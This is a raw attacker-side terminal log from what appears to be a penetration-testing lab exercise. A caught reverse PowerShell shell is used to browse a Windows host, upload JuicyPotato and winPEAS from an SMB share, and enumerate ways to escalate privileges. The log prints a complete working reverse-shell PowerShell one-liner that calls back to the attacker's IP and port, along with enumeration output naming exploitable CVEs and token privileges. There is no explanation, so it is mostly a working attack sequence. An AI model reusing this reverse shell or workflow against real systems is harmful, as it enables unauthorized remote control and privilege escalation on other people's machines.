kali@kali:~$ nc -nvlp 4242
listening on [any] 4242 ...
connect to [192.168.19.40] from (UNKNOWN) [192.168.40.42] 49683
dir


    Directory: C:\Program Files (x86)\Apache Software Foundation\Tomcat 8.5


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/15/2019  12:36 PM                bin                                                                   
d-----        2/15/2019  12:36 PM                conf                                                                  
d-----        2/15/2019  12:36 PM                lib                                                                   
d-----        4/27/2020  11:51 AM                logs                                                                  
d-----        2/15/2019  12:36 PM                temp                                                                  
d-----        2/15/2019  12:36 PM                webapps                                                               
d-----        2/15/2019  12:36 PM                work                                                                  
-a----        9/13/2017   9:30 PM          58153 LICENSE                                                               
-a----        9/13/2017   9:30 PM           1774 NOTICE                                                                
-a----        9/13/2017   9:30 PM           7241 RELEASE-NOTES                                                         
-a----        9/13/2017   9:30 PM          21630 tomcat.ico                                                            
-a----        9/13/2017   9:30 PM          79424 Uninstall.exe                                                         


PS C:\Program Files (x86)\Apache Software Foundation\Tomcat 8.5> cd c:\users\
PS C:\users> dir


    Directory: C:\users


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/15/2019  12:56 PM                Administrator                                                         
d-----        3/20/2019  11:54 AM                Offsec                                                                
d-r---        2/14/2019   2:27 PM                Public                                                                
d-----        3/29/2019  10:57 PM                Rob                                                                   


PS C:\users> cd Rob
PS C:\users\Rob> dir


    Directory: C:\users\Rob


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-r---        3/29/2019  10:56 PM                3D Objects                                                            
d-r---        3/29/2019  10:56 PM                Contacts                                                              
d-r---        3/29/2019  10:56 PM                Desktop                                                               
d-r---        3/29/2019  10:56 PM                Documents                                                             
d-r---        3/29/2019  10:56 PM                Downloads                                                             
d-r---        3/29/2019  10:56 PM                Favorites                                                             
d-r---        3/29/2019  10:56 PM                Links                                                                 
d-r---        3/29/2019  10:56 PM                Music                                                                 
d-r---        3/29/2019  10:57 PM                Pictures                                                              
d-r---        3/29/2019  10:56 PM                Saved Games                                                           
d-r---        3/29/2019  10:57 PM                Searches                                                              
d-r---        3/29/2019  10:56 PM                Videos                                                                


PS C:\users\Rob> 
PS C:\users\Rob> cd Desktop
dPS C:\users\Rob\Desktop> ir


    Directory: C:\users\Rob\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/27/2020  11:49 AM             32 local.txt                                                             


PS C:\users\Rob\Desktop> dir


    Directory: C:\users\Rob\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/27/2020  11:49 AM             32 local.txt                                                             


PS C:\users\Rob\Desktop> copy //192.168.19.40/share/JuicyPotato.exe
PS C:\users\Rob\Desktop> copy //192.168.19.40/share/JuicyPotato.exe
PS C:\users\Rob\Desktop> copy //192.168.19.40/share/winPEAS.exe
PS C:\users\Rob\Desktop> .\C:\Users\Rob\Desktop\juicypotato.exe
PS C:\users\Rob\Desktop> dir   


    Directory: C:\users\Rob\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/27/2020  11:26 AM         347648 JuicyPotato.exe                                                       
-a----        4/27/2020  11:49 AM             32 local.txt                                                             
-a----        4/27/2020  11:08 AM         241664 winPEAS.exe                                                           


PS C:\users\Rob\Desktop> .\JuicyPotato.exe
JuicyPotato v0.1 

Mandatory args: 
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args: 
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
PS C:\users\Rob\Desktop> C:\User\Desktop\JuicyPotato.exe
PS C:\users\Rob\Desktop> .\C:\User\Desktop\JuicyPotato.exe
PS C:\users\Rob\Desktop> .\User\Desktop\JuicyPotato.exe
PS C:\users\Rob\Desktop> ./User/Desktop/JuicyPotato.exe
PS C:\users\Rob\Desktop> copy //192.168.19.40/share/test_clsid.bat
PS C:\users\Rob\Desktop> dir


    Directory: C:\users\Rob\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/27/2020  11:26 AM         347648 JuicyPotato.exe                                                       
-a----        4/27/2020  11:49 AM             32 local.txt                                                             
-a----        4/27/2020  12:03 PM            287 test_clsid.bat                                                        
-a----        4/27/2020  11:08 AM         241664 winPEAS.exe                                                           


PS C:\users\Rob\Desktop> .\test_clsid.bat
PS C:\users\Rob\Desktop> dir


    Directory: C:\users\Rob\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/27/2020  11:26 AM         347648 JuicyPotato.exe                                                       
-a----        4/27/2020  11:49 AM             32 local.txt                                                             
-a----        4/27/2020  12:03 PM            287 test_clsid.bat                                                        
-a----        4/27/2020  11:08 AM         241664 winPEAS.exe                                                           


PS C:\users\Rob\Desktop> .\test_clsid.bat
PS C:\users\Rob\Desktop> $CLSID = Get-ItemProperty HKCR:\clsid\* | select-object AppID,@{N='CLSID'; E={$_.pschildname}} | where-object {$_.appid -ne $null}
PS C:\users\Rob\Desktop> $CLSID = Get-ItemProperty HKCR:\clsid\* | select-object AppID,@{N='CLSID'; E={$_.pschildname}} | where-object {$_.appid -ne $null}
PS C:\users\Rob\Desktop> New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT

Name           Used (GB)     Free (GB) Provider      Root                                               CurrentLocation
----           ---------     --------- --------      ----                                               ---------------
HKCR                                   Registry      HKEY_CLASSES_ROOT                                                 


PS C:\users\Rob\Desktop> CLSID = Get-ItemProperty HKCR:\clsid\* | select-object AppID,@{N='CLSID'; E={$_.pschildname}} | where-object {$_.appid -ne $null}
PS C:\users\Rob\Desktop> $CLSID
PS C:\users\Rob\Desktop> ^[[A
PS C:\users\Rob\Desktop> $CLSID    
PS C:\users\Rob\Desktop> ./winPEAS.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
   Creating Dynamic lists, this could take a while, please wait...
   - Checking if domain...
   - Getting Win32_UserAccount info...
   - Creating current user groups list...
   - Creating active users list...
   - Creating disabled users list...
   - Admin users list...
     
             *((,.,/((((((((((((((((((((/,  */                                                                                                           
      ,/*,..*((((((((((((((((((((((((((((((((((,                                                                                                         
    ,*/((((((((((((((((((/,  .*//((//**, .*(((((((*                                                                                                      
    ((((((((((((((((**********/########## .(* ,(((((((                                                                                                   
    (((((((((((/********************/####### .(. (((((((                                                                                                 
    ((((((..******************/@@@@@/***/###### ./(((((((                                                                                                
    ,,....********************@@@@@@@@@@(***,#### .//((((((                                                                                              
    , ,..********************/@@@@@%@@@@/********##((/ /((((                                                                                             
    ..((###########*********/%@@@@@@@@@/************,,..((((                                                                                             
    .(##################(/******/@@@@@/***************.. /((                                                                                             
    .(#########################(/**********************..*((                                                                                             
    .(##############################(/*****************.,(((                                                                                             
    .(###################################(/************..(((                                                                                             
    .(#######################################(*********..(((                                                                                             
    .(#######(,.***.,(###################(..***.*******..(((                                                                                             
    .(#######*(#####((##################((######/(*****..(((                                                                                             
    .(###################(/***********(##############(...(((                                                                                             
    .((#####################/*******(################.((((((                                                                                             
    .(((############################################(..((((                                                                                              
    ..(((##########################################(..(((((                                                                                              
    ....((########################################( .(((((                                                                                               
    ......((####################################( .((((((                                                                                                
    (((((((((#################################(../((((((                                                                                                 
        (((((((((/##########################(/..((((((                                                                                                   
              (((((((((/,.  ,*//////*,. ./(((((((((((((((.                                                                                               
                 (((((((((((((((((((((((((((((/                                                                                                          

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.                               
                                                                                                                                                         
  WinPEAS vBETA VERSION, Please if you find any issue let me know in https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues by carlospolop                                                                                                                                              

  [+] Leyend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links

   [?] You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation


  ==========================================(System Information)==========================================

  [+] Basic System Information(T1082&T1124&T1012&T1497&T1212)
   [?] Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits                                                                                                                                                   
    Hostname: HomeStudy
    ProductName: Windows 10 Pro
    EditionID: Professional
    ReleaseId: 1709
    BuildBranch: rs3_release
    CurrentMajorVersionNumber: 10
    CurrentVersion: 6.3
    Architecture: AMD64
    ProcessorCount: 1
    SystemLang: en-GB
    KeyboardLang: English (United States)
    TimeZone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
    IsVirtualMachine: True
    Current Time: 4/27/2020 12:48:17 PM
    HighIntegrity: False
    PartOfDomain: False
    Hotfixes: KB4058043, KB4090007, KB4134661, KB4295110, KB4462930, KB4485448, KB4487038, KB4486996, 

  [?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
    OS Build Number: 16299
       [!] CVE-2019-0836 : VULNERABLE
        [>] https://exploit-db.com/exploits/46718
        [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/                                                                                                                                                 

       [!] CVE-2019-0841 : VULNERABLE
        [>] https://github.com/rogue-kdc/CVE-2019-0841
        [>] https://rastamouse.me/tags/cve-2019-0841/

       [!] CVE-2019-1064 : VULNERABLE
        [>] https://www.rythmstick.net/posts/cve-2019-1064/

       [!] CVE-2019-1130 : VULNERABLE
        [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

       [!] CVE-2019-1253 : VULNERABLE
        [>] https://github.com/padovah4ck/CVE-2019-1253

       [!] CVE-2019-1315 : VULNERABLE
        [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

       [!] CVE-2019-1385 : VULNERABLE
        [>] https://www.youtube.com/watch?v=K6gHnr-VkAg

       [!] CVE-2019-1388 : VULNERABLE
        [>] https://github.com/jas502n/CVE-2019-1388

       [!] CVE-2019-1405 : VULNERABLE
        [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/                                                                                              

    Finished. Found 9 potential vulnerabilities.

  [+] PowerShell Settings()
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.16299.15
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 

  [+] Audit Settings(T1012)
   [?] Check what is being logged 
    Not Found

  [+] WEF Settings(T1012)
   [?] Windows Event Forwarding, is interesting to know were are sent the logs 
    Not Found

  [+] LAPS Settings(T1012)
   [?] If installed, local administrator password is changed frequently and is restricted by ACL 
    LAPS Enabled: LAPS not installed

  [+] Wdigest()
   [?] If enabled, plain-text crds could be stored in LSASS https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#wdigest
    Wdigest is not enabled

  [+] LSA Protection()
   [?] If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#lsa-protection                                                                     
    LSA Protection is not enabled

  [+] Credentials Guard()
   [?] If enabled, a driver is needed to read LSASS memory https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#credential-guard                                                                                                                                                      
    CredentialGuard is not enabled

  [+] Cached Creds()
   [?] If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#cached-credentials                                                                                                                       
    cachedlogonscount is 10

  [+] User Environment Variables()
   [?] Check for some passwords or keys in the env variables 
    COMPUTERNAME: HOMESTUDY
    PUBLIC: C:\Users\Public
    LOCALAPPDATA: C:\Users\Rob\AppData\Local
    PSModulePath: C:\Users\Rob\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\Rob\AppData\Local\Microsoft\WindowsApps
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 6
    ProgramFiles: C:\Program Files
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    USERPROFILE: C:\Users\Rob
    SystemRoot: C:\Windows
    ALLUSERSPROFILE: C:\ProgramData
    ProgramData: C:\ProgramData
    PROCESSOR_REVISION: 4f01
    USERNAME: Rob
    CommonProgramW6432: C:\Program Files\Common Files
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 79 Stepping 1, GenuineIntel
    ComSpec: C:\Windows\system32\cmd.exe
    SystemDrive: C:
    TEMP: C:\Users\Rob\AppData\Local\Temp
    NUMBER_OF_PROCESSORS: 1
    APPDATA: C:\Users\Rob\AppData\Roaming
    TMP: C:\Users\Rob\AppData\Local\Temp
    ProgramW6432: C:\Program Files
    windir: C:\Windows
    USERDOMAIN: HOMESTUDY

  [+] System Environment Variables()
   [?] Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    OS: Windows_NT
    Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 1
    PROCESSOR_LEVEL: 6
    PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 79 Stepping 1, GenuineIntel
    PROCESSOR_REVISION: 4f01

  [+] HKCU Internet Settings(T1012)
    DisableCachingOfSSLPages: 0
    IE5_UA_Backup_Flag: 5.0
    PrivacyAdvanced: 1
    SecureProtocols: 2688
    User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
    CertificateRevocation: 1
    EnableNegotiate: 1
    ProxyEnable: 0
    ZonesSecurityUpgrade: System.Byte[]
    WarnonZoneCrossing: 0
    MigrateProxy: 1

  [+] HKLM Internet Settings(T1012)
    ActiveXCache: C:\Windows\Downloaded Program Files
    CodeBaseSearchPath: CODEBASE
    EnablePunycode: 1
    MinorVersion: 0
    WarnOnIntranet: 1

  [+] Drives Information(T1120)
   [?] Remember that you should search more info inside the other drives 
    C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 2 GB)(Permissions: Authenticated Users [AppendData/CreateDirectories])
    D:\ (Type: CDRom)

  [+] AV Information(T1063)
    Some AV was detected, search for bypasses
    Name: Windows Defender
    ProductEXE: windowsdefender://
    pathToSignedReportingExe: %ProgramFiles%\Windows Defender\MsMpeng.exe

  [+] UAC Status(T1012)
   [?] If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access                                                                                                                         
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 0
    LocalAccountTokenFilterPolicy: 
    FilterAdministratorToken: 
      [*] EnableLUA != 1, UAC policies disabled.
      [+] Any local account can be used for lateral movement.                                                                                            


  ===========================================(Users Information)===========================================

  [+] Users(T1087&T1069&T1033)
   [?] Check if you have some admin equivalent privileges https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups
  Current user: 35mRob
  Current groups: Domain Users, Everyone, Users, Service, Console Logon, Authenticated Users, This Organization, Local account, Local, NTLM Authentication
   =================================================================================================

    35mHOMESTUDY\Administrator(Disabled): Built-in account for administering the computer/domain
        |->Groups: Administrators
        |->Password: CanChange-NotExpi-Req

    35mHOMESTUDY\DefaultAccount(Disabled): A user account managed by the system.
        |->Groups: System Managed Accounts Group
        |->Password: CanChange-NotExpi-NotReq

    35mHOMESTUDY\Guest(Disabled): Built-in account for guest access to the computer/domain
        |->Groups: Guests
        |->Password: NotChange-NotExpi-NotReq

    35mHOMESTUDY\Offsec
        |->Groups: Administrators
        |->Password: CanChange-NotExpi-NotReq

    35mHOMESTUDY\35mRob
        |->Groups: Users
        |->Password: CanChange-NotExpi-Req

    35mHOMESTUDY\WDAGUtilityAccount(Disabled): A user account managed and used by the system for Windows Defender Application Guard scenarios.
        |->Password: CanChange-Expi-Req


  [+] Current Token privileges(T1134)
   [?] Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#token-manipulation                                                                                                                                                     
    SeShutdownPrivilege: DISABLED
    SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeUndockPrivilege: DISABLED
    SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeIncreaseWorkingSetPrivilege: DISABLED
    SeTimeZonePrivilege: DISABLED

  [+] Clipboard text(T1134)


  [+] Logged users(T1087&T1033)
    35mHOMESTUDY\35mRob

  [+] RDP Sessions(T1087&T1033)
    Not Found

  [+] Ever logged users(T1087&T1033)
    35mHOMESTUDY\35mRob
    35mHOMESTUDY\Offsec

  [+] Looking for AutoLogon credentials(T1012)
    Not Found

  [+] Home folders found(T1087&T1083&T1033)
    C:\Users\Administrator
    C:\Users\All Users
    C:\Users\Default
    C:\Users\Default User
    C:\Users\Offsec
    C:\Users\Public : Service [WriteData/CreateFiles]
    C:\Users\Rob

  [+] Password Policies(T1201)
   [?] Check for a possible brute-force 
    Domain: Builtin
    SID: S-1-5-32
    MaxPasswordAge: 42.22:47:31.7437440
    MinPasswordAge: 00:00:00
    MinPasswordLength: 0
    PasswordHistoryLength: 0
    PasswordProperties: 0
   =================================================================================================

    Domain: 35mHOMESTUDY
    SID: S-1-5-21-4197226209-1053957285-1453810330
    MaxPasswordAge: 42.00:00:00
    MinPasswordAge: 00:00:00
    MinPasswordLength: 0
    PasswordHistoryLength: 0
    PasswordProperties: 0
   =================================================================================================



  =======================================(Processes Information)=======================================

  [+] Interesting Processes -non Microsoft-(T1010&T1057&T1007)
   [?] Check if any interesting proccesses for memmory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes                                                                                                                
    conhost(4072)[C:\Windows\system32\conhost.exe] -- POwn:35m Rob
    Command Line: \??\C:\Windows\system32\conhost.exe 0x4
   =================================================================================================

    powershell(3932)[C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe] -- POwn:35m Rob
    Command Line: powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.19.40',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"                                                                       
   =================================================================================================                                                     

    Tomcat8(2248)[C:\Program Files (x86)\Apache Software Foundation\Tomcat 8.5\bin\Tomcat8.exe] -- POwn:35m Rob
    Command Line: "C:\Program Files (x86)\Apache Software Foundation\Tomcat 8.5\bin\Tomcat8.exe" //RS//Tomcat8
   =================================================================================================                                                     

    conhost(2272)[C:\Windows\system32\conhost.exe] -- POwn:35m Rob
    Command Line: \??\C:\Windows\system32\conhost.exe 0x4
   =================================================================================================

    winPEAS(2436)[C:\users\Rob\Desktop\winPEAS.exe] -- POwn:35m Rob -- isDotNet
    Command Line: "C:\users\Rob\Desktop\winPEAS.exe"
   =================================================================================================                                                     

    FTPServer(2240)[C:\Program Files (x86)\FreeFloatFTP\FTPServer.exe] -- POwn:35m Rob
    Command Line: "C:\Program Files (x86)\FreeFloatFTP\FTPServer.exe"
   =================================================================================================                                                     



  ========================================(Services Information)========================================

  [+] Interesting Services -non Microsoft-(T1007)
   [?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services                                                                                                                   
    Tomcat8(Apache Software Foundation - Apache Tomcat 8.5 Tomcat8)["C:\Program Files (x86)\Apache Software Foundation\Tomcat 8.5\bin\Tomcat8.exe" //RS//Tomcat8] - Auto - Running                                                                                                                                
    Apache Tomcat 8.5.21 Server - http://tomcat.apache.org/
   =================================================================================================                                                     

    VGAuthService(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Auto - Running
    Alias Manager and Ticket Service
   =================================================================================================                                                     

    VMTools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Auto - Running
    Provides support for synchronizing objects between the host and guest operating systems.
   =================================================================================================                                                     

    VMwareCAFCommAmqpListener(VMware CAF AMQP Communication Service)["C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\CommAmqpListener.exe"] - Manual - Stopped
    VMware Common Agent AMQP Communication Service
   =================================================================================================                                                     

    VMwareCAFManagementAgentHost(VMware CAF Management Agent Service)["C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\ManagementAgentHost.exe"] - Manual - Stopped
    VMware Common Agent Management Agent Service
   =================================================================================================                                                     


  [+] Modifiable Services(T1007)
   [?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    You cannot modify any service

  [+] Looking if you can modify any service registry()
   [?] Check if you can modify the registry of a service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services-registry-permissions                                                                                                                                                     
    [-] Looks like you cannot change the registry of any service...

  [+] Checking write permissions in PATH folders (DLL Hijacking)()
   [?] Check for DLL Hijacking in PATH folders https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking
    C:\Program Files (x86)\Common Files\Oracle\Java\javapath
    C:\Windows\system32
    C:\Windows
    C:\Windows\System32\Wbem
    C:\Windows\System32\WindowsPowerShell\v1.0\


  ====================================(Applications Information)====================================

  [+] Current Active Window Application(T1010&T1518)
System.NullReferenceException: Object reference not set to an instance of an object.
   at winPEAS.MyUtils.GetPermissionsFile(String path, Dictionary`2 SIDs)                                                                                 
   at winPEAS.Program.<PrintInfoApplications>g__PrintActiveWindow|44_0()                                                                                 

  [+] Installed Applications --Via Program Files/Uninstall registry--(T1083&T1012&T1010&T1518)
   [?] Check if you can modify installed software https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
    C:\Program Files (x86)\Java\jre1.8.0_201
    C:\Program Files\Common Files
    C:\Program Files\desktop.ini
    C:\Program Files\internet explorer
    C:\Program Files\rempl
    C:\Program Files\Uninstall Information
    C:\Program Files\VMware
    C:\Program Files\Windows Defender
    C:\Program Files\Windows Defender Advanced Threat Protection
    C:\Program Files\Windows Mail
    C:\Program Files\Windows Media Player
    C:\Program Files\Windows Multimedia Platform
    C:\Program Files\windows nt
    C:\Program Files\Windows Photo Viewer
    C:\Program Files\Windows Portable Devices
    C:\Program Files\Windows Security
    C:\Program Files\Windows Sidebar
    C:\Program Files\WindowsApps
    C:\Program Files\WindowsPowerShell


  [+] Autorun Applications(T1010)
   [?] Check if you can modify other users AutoRuns binaries https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup
    Folder: C:\Program Files\Windows Defender
    File: C:\Program Files\Windows Defender\MSASCuiL.exe (Unquoted and Space detected)
    RegPath: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
   =================================================================================================

    Folder: C:\Program Files\VMware\VMware Tools
    File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr
    RegPath: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
   =================================================================================================

    Folder: C:\Program Files (x86)\Common Files\Java\Java Update
    File: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
    RegPath: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
   =================================================================================================

System.Collections.Generic.KeyNotFoundException: The given key was not present in the dictionary.
   at System.ThrowHelper.ThrowKeyNotFoundException()                                                                                                     
   at System.Collections.Generic.Dictionary`2.get_Item(TKey key)                                                                                         
   at winPEAS.Program.<PrintInfoApplications>g__PrintAutoRuns|44_2()                                                                                     

  [+] Scheduled Applications --Non Microsoft--(T1010)
   [?] Check if you can modify other users scheduled binaries https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup
System.IO.FileNotFoundException: Could not load file or assembly 'Microsoft.Win32.TaskScheduler, Version=2.8.16.0, Culture=neutral, PublicKeyToken=c416bc1b32d97233' or one of its dependencies. The system cannot find the file specified.                                                                       
File name: 'Microsoft.Win32.TaskScheduler, Version=2.8.16.0, Culture=neutral, PublicKeyToken=c416bc1b32d97233'                                           
   at winPEAS.ApplicationInfo.GetScheduledAppsNoMicrosoft()                                                                                              
   at winPEAS.Program.<PrintInfoApplications>g__PrintScheduled|44_3()                                                                                    
                                                                                                                                                         
WRN: Assembly binding logging is turned OFF.                                                                                                             
To enable assembly bind failure logging, set the registry value [HKLM\Software\Microsoft\Fusion!EnableLog] (DWORD) to 1.                                 
Note: There is some performance penalty associated with assembly bind failure logging.                                                                   
To turn this feature off, remove the registry value [HKLM\Software\Microsoft\Fusion!EnableLog].                                                          
                                                                                                                                                         


  =========================================(Network Information)=========================================

  [+] Network Shares(T1135)
    ADMIN$ (Path: C:\Windows)
    C$ (Path: C:\)
    IPC$ (Path: )

  [+] Host File(T1016)

  [+] Network Ifaces and known hosts(T1016)
   [?] The masks are only for the IPv4 addresses 
    Ethernet0[00:50:56:8A:A8:E8]: 192.168.40.42 / 255.255.255.0
        Gateways: 192.168.40.254
        DNSs: 192.168.40.254
        Known hosts:
          192.168.40.254        00-50-56-8A-F9-8F     Dynamic
          192.168.40.255        FF-FF-FF-FF-FF-FF     Static
          224.0.0.22            01-00-5E-00-00-16     Static
          224.0.0.252           01-00-5E-00-00-FC     Static
          239.255.255.250       01-00-5E-7F-FF-FA     Static

    Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0
        DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1
        Known hosts:
          224.0.0.22            00-00-00-00-00-00     Static
          239.255.255.250       00-00-00-00-00-00     Static


  [+] Current Listening Ports(T1049&T1049)
   [?] Check for services restricted from the outside 
    Proto     Local Address          Foreing Address        State
    TCP       0.0.0.0:21                                    Listening
    TCP       0.0.0.0:135                                   Listening
    TCP       0.0.0.0:445                                   Listening
    TCP       0.0.0.0:3389                                  Listening
    TCP       0.0.0.0:8009                                  Listening
    TCP       0.0.0.0:8080                                  Listening
    TCP       0.0.0.0:49664                                 Listening
    TCP       0.0.0.0:49665                                 Listening
    TCP       0.0.0.0:49666                                 Listening
    TCP       0.0.0.0:49667                                 Listening
    TCP       0.0.0.0:49668                                 Listening
    TCP       0.0.0.0:49669                                 Listening
    TCP       0.0.0.0:49670                                 Listening
    TCP       10.60.60.214:5040                             Listening
    TCP       127.0.0.1:8005                                Listening
    TCP       127.0.0.1:8888                                Listening
    TCP       192.168.40.42:139                             Listening
    TCP       [::]:135                                      Listening
    TCP       [::]:445                                      Listening
    TCP       [::]:3389                                     Listening
    TCP       [::]:8009                                     Listening
    TCP       [::]:8080                                     Listening
    TCP       [::]:49664                                    Listening
    TCP       [::]:49665                                    Listening
    TCP       [::]:49666                                    Listening
    TCP       [::]:49667                                    Listening
    TCP       [::]:49668                                    Listening
    TCP       [::]:49669                                    Listening
    TCP       [::]:49670                                    Listening
    UDP       0.0.0.0:123                                   Listening
    UDP       0.0.0.0:500                                   Listening
    UDP       0.0.0.0:3389                                  Listening
    UDP       0.0.0.0:4500                                  Listening
    UDP       0.0.0.0:5050                                  Listening
    UDP       0.0.0.0:5353                                  Listening
    UDP       0.0.0.0:5355                                  Listening
    UDP       127.0.0.1:1900                                Listening
    UDP       127.0.0.1:50667                               Listening
    UDP       127.0.0.1:54783                               Listening
    UDP       192.168.40.42:137                             Listening
    UDP       192.168.40.42:138                             Listening
    UDP       192.168.40.42:1900                            Listening
    UDP       192.168.40.42:50666                           Listening
    UDP       [::]:123                                      Listening
    UDP       [::]:500                                      Listening
    UDP       [::1]:1900                                    Listening
    UDP       [::1]:50665                                   Listening

  [+] Firewall Rules(T1016)
   [?] Showing only DENY rules (too many ALLOW rules always) 
